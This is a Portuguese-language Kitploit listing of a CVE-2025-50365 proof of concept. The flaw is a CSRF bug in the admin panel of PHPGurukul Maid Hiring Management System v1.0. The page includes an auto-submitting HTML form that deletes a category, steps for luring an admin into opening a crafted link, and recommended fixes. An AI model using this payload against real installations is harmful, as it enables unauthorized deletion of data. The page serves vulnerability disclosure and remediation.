Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2025-50365_CSRF_DELETE_CATEGORY-phpgurukul-CVE — Prova de conceito para uma vulnerabilidade CSRF no PHPGurukul Maid Hiring Management System v1.0, demonstrando exclusão não autorizada de categorias por meio de links maliciosos criados. | Kitploit
Ferramentas/GitHubGitHub/1h3ll/cve-2025-50365_csrf_delete_category-phpgurukul-cve
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebCTFTestes de PenetraçãoAprendizado e Educação
GitHub1h3ll/cve-2025-50365_csrf_delete_category-phpgurukul-cve

CVE-2025-50365_CSRF_DELETE_CATEGORY-phpgurukul-CVE

Prova de conceito para uma vulnerabilidade CSRF no PHPGurukul Maid Hiring Management System v1.0, demonstrando exclusão não autorizada de categorias por meio de links maliciosos criados.

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar
Ver Repositório
há 1 anoAinda não revisado

Nome do Projeto e URL do Repositório: Maid Hiring Management System using PHP and MySQL

Tipo de Vulnerabilidade: Falsificação de Solicitação do Lado do Cliente

Versões Afetadas: v1.0

💣Descrição da Vulnerabilidade: Existe uma vulnerabilidade de Cross-Site Request Forgery (CSRF) no painel de administração do PHPGurukul Hiring Management System, permitindo que um atacante exclua categorias de contratação arbitrárias ao enganar um administrador autenticado para visitar um site malicioso. Isso pode levar à exclusão de dados e alterações não autorizadas no nível de administrador.

👩‍💻Impacto: Exclusão não autorizada de categorias.

🛜Prova de Conceito (PoC):

  1. Havia uma funcionalidade de exclusão de categoria onde apenas o administrador autenticado podia excluir categorias. 1
  2. Código HTML para enviar uma solicitação GET para o endpoint /admin/manage-category.php CSRF-POC
root@kitploit:~
<html>
  <body>
    <form action="http://127.0.0.1/mhms/admin/manage-category.php">
      <input type="hidden" name="delid" value="13" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      history.pushState('', '', '/');
      document.forms[0].submit();
    </script>
  </body>
</html>
  1. Use o código HTML e crie uma URL maliciosa. 3
  2. Após o administrador clicar no link, a categoria será excluída. 4 5

Recomendação: Implementação de tokens CSRF em formulários de administração, aplicar cookies SameSite e validar a origem da solicitação para evitar ações não autorizadas.

Baixar ferramenta